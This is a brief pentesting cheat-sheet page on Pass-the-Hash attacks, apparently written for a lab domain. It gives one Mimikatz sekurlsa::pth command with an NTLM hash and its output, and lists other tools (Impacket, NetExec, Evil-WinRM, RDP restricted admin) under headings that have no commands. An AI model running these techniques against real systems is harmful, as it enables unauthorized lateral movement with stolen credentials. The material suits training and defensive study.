Pass the Hash (PtH)

Mimikatz

Mimikatz
c:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
user    : julio
domain  : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM    : 64F12CDDAA88057E06A81B54E73B949B
  |  PID  8404
  |  TID  4268
  |  LSA Process was already R/W
  |  LUID 0 ; 5218172 (00000000:004f9f7c)
  \_ msv1_0   - data copy @ 0000028FC91AB510 : OK !
  \_ kerberos - data copy @ 0000028FC964F288
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000028FC9673AE8 (32) -> null

PowerShell Invoke-TheHash

Impacket PsExec

There are several other tools in the Impacket toolkit we can use for command execution using Pass the Hash attacks, such as:

Netexec - CME

NetExec - CME

Evil-WinRM

Evil-WinRM

RDP (Linux)

  1. Enable Restricted Admin Mode to Allow PtH

With CME: (dont' work with nxc, don'know why....)

  • Enable RDP

  • Allow PtH

  1. Pass the Hash Using RDP

Resources

Last updated